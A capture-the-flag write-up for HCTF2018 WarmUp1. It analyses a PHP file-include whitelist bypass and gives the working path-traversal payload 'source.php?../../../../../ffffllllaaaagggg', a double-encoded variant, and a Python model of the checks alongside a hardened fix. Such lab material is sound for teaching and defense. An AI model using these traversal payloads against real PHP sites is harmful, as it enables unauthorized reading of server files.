HCTF2018 WarmUp1
Q7nl1s admin


Open the target in the browser and view the page source from the developer tools: an HTML comment points at source.php (screenshot 1).

Following that hint, open source.php, which prints its own source via highlight_file():

```php
<?php
highlight_file(__FILE__);
class emmm
{
    public static function checkFile(&$page)
    {
        $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
        if (! isset($page) || !is_string($page)) {
            echo "you can't see it";
            return false;
        }

        if (in_array($page, $whitelist)) {
            return true;
        }

        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        $_page = urldecode($page);
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }
        echo "you can't see it";
        return false;
    }
}

if (! empty($_REQUEST['file'])
    && is_string($_REQUEST['file'])
    && emmm::checkFile($_REQUEST['file'])
) {
    include $_REQUEST['file'];
    exit;
} else {
    echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
```

Step-by-step analysis

```php
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
    echo "you can't see it";
    return false;
}
```

$page must be set and must be a string; arrays (file[]=...) and missing values are rejected here.

```php
if (! empty($_REQUEST['file'])            // the hint names two files, hint.php and source.php; what we want is in hint.php
    && is_string($_REQUEST['file'])       // hint.php says the flag is in ffffllllaaaagggg
    // payload idea: source.php?../../../../ffffllllaaaagggg
    && emmm::checkFile($_REQUEST['file'])
) {
    include $_REQUEST['file'];            // only reached when all three conditions are true
    exit;
} else {
    echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
```

So the include only happens when all three conditions hold: file is non-empty, it is a string, and checkFile() accepts it. Note that $_REQUEST covers GET, POST and cookie values, so the parameter can be delivered by any of them. The whitelist tells us the other interesting file is hint.php, so open that next.

hint.php reveals where the flag lives, the file ffffllllaaaagggg (screenshot 2). Back to the rest of checkFile():

```php
if (in_array($page, $whitelist)) {
    return true;                          // exact match only; nothing to bypass here
}

$_page = mb_substr(
    $page,
    0,
    mb_strpos($page . '?', '?')           // cut at the first '?', which is what makes directory traversal possible
);
if (in_array($_page, $whitelist)) {       // is the truncated $_page one of source.php / hint.php?
    return true;
}

$_page = urldecode($page);                // second decode: a double-encoded '?' (%253f) survives to here
$_page = mb_substr(
    $_page,
    0,
    mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
    return true;
}
echo "you can't see it";
return false;
}
```

mb_substr() and mb_strpos() together reduce $_page to the substring from the start up to, but not including, the first '?' in the string. Appending '?' before the search guarantees mb_strpos() finds something: a value with no '?' is kept whole. The bug is that only this truncated copy is compared with the whitelist, while include receives the original, untruncated $_REQUEST['file'].

That is exactly the shape of a directory traversal: put a whitelisted file name in front of the '?' to satisfy the check, and the path we actually want after it.

After some testing the working payload is: source.php?file=source.php?../../../../../ffffllllaaaagggg

The part before the first '?' is source.php, so the second check returns true. include then opens "source.php?../../../../../ffffllllaaaagggg" relative to the web root; PHP collapses the '..' components lexically while resolving the path, so the non-existent directory "source.php?" is simply stepped back over and /ffffllllaaaagggg is read. Extra "../" segments beyond the depth of the web root are harmless, which is why five are used. hint.php works just as well as the prefix, and because of the third check a double-encoded separator (source.php%253f../../../../../ffffllllaaaagggg) also passes.
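To make the three checks and the path resolution concrete, here is a Python model of emmm::checkFile() and of what include() ends up opening. This is an added illustration, not the challenge's own code: it assumes a document root of /var/www/html and the flag at /ffffllllaaaagggg, as the payload above implies, and it adds a hardened variant (safe_include_target) that resolves the request through the whitelist key so user input never reaches include.

```python
"""Python model of emmm::checkFile() from the challenge's source.php.

Added illustration, not the challenge's own code. It reproduces the three
whitelist checks and PHP's lexical '..' collapsing so the reader can see
which file= values get through and which path include() opens.
Assumptions: document root /var/www/html, flag at /ffffllllaaaagggg.
"""
import posixpath
from typing import Optional
from urllib.parse import unquote

WHITELIST = {"source": "source.php", "hint": "hint.php"}
WEBROOT = "/var/www/html"  # assumed document root of the target


def _before_first_qmark(s: str) -> str:
    # mb_substr($s, 0, mb_strpos($s . '?', '?')): keep everything before the
    # first '?'; the appended '?' means a string without one is kept whole.
    return s.split("?", 1)[0]


def check_file(page) -> Optional[str]:
    """Name of the check that accepted `page`, or None when it is rejected.

    `page` is the value PHP already URL-decoded once into $_REQUEST['file'].
    """
    # !empty() && is_string(): "" and "0" are rejected before checkFile runs
    if not isinstance(page, str) or page in ("", "0"):
        return None
    if page in WHITELIST.values():
        return "exact"  # check 1: exact match, no bypass
    if _before_first_qmark(page) in WHITELIST.values():
        return "truncate"  # check 2: whitelisted name before the first '?'
    # check 3: urldecode() on an already-decoded value, so a double-encoded
    # '?' (%253f on the wire, %3f here) also gets through. PHP's urldecode
    # maps '+' to space and unquote() does not; irrelevant for these inputs.
    if _before_first_qmark(unquote(page)) in WHITELIST.values():
        return "urldecode+truncate"
    return None


def resolved_include_path(page: str, webroot: str = WEBROOT) -> str:
    """Path that `include $page` opens for a relative $page.

    PHP collapses '..' components lexically while resolving the path, so the
    bogus directory 'source.php?' never has to exist: each '../' steps back
    one component and enough of them reach '/'.
    """
    return posixpath.normpath(posixpath.join(webroot, page))


def safe_include_target(page) -> Optional[str]:
    """Hardened variant: look the request up by whitelist key and include
    only the mapped file name; the raw user value never reaches include()."""
    if not isinstance(page, str):
        return None
    return WHITELIST.get(page)


if __name__ == "__main__":
    # constructed sample inputs: three that pass and one that fails
    for p in ("hint.php",
              "source.php?../../../../../ffffllllaaaagggg",
              "source.php%3f../../../../../ffffllllaaaagggg",
              "../ffffllllaaaagggg"):
        verdict = check_file(p)
        target = resolved_include_path(p) if verdict else "(rejected)"
        print(f"{p!r:55} {verdict!s:20} -> {target}")
```

Running it shows the plain traversal being rejected while both '?' variants are accepted and resolve to /ffffllllaaaagggg; the hardened lookup accepts only the literal keys "source" and "hint".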

The response contains the flag (screenshot 3).
